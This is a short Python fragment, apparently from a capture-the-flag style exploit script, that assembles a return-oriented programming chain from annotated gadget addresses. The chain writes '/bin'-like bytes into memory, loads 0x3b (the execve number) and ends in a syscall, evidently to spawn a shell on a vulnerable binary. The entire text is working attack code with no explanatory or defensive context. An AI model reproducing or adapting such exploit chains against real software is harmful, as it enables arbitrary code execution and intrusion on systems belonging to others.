payload = p64(0x420328)
#0x420328: pop rbx ; retf
payload += p64(0x6e69622f)+p32(0x4011ad)+p32(0x33)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x515095)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x420328)
# 0x420328: pop rbx ; retf
payload += p64(0x68662f)+p32(0x4011ad)+p32(0x33)
# 0x00000000004011ad: pop rbp; ret; 
payload += p64(0x515099)+p64(0x4011ac)
# 0x4011ac: add dword ptr [rbp - 0x3d], ebx ; nop ; ret
payload += p64(0x4985d4)
# 0x00000000004985d4: pop rdx; ret; 
payload += p64(0x4985d4)+p64(0x42d2fa)
# 0x000000000042d2fa: xchg edx, eax; ret; 
payload += p64(0x4eb911)
# 0x00000000004eb911: sub esi, esi; jmp rax; 
payload += b''
# 0x00000000004985d4: pop rdx; ret; 
payload += p64(0x4985d4)+p64(0x42d2fa)
# 0x000000000042d2fa: xchg edx, eax; ret; 
payload += p64(0x4ecef0)
# 0x00000000004ecef0: pop rdi; pop rbx; cld; call rax; 
payload += p64(0x515058)
# 0x00000000004985d4: pop rdx; ret; 
payload += p64(0x3b)+p64(0x42d2fa)
# 0x000000000042d2fa: xchg edx, eax; ret; 
payload += p64(0x41de2a)
# 0x41de2a: pop rdx ; retf
payload += p64(0x0)+p32(0x493262)+p32(0x33)
# 0x0000000000493262: syscall; 
payload += b''
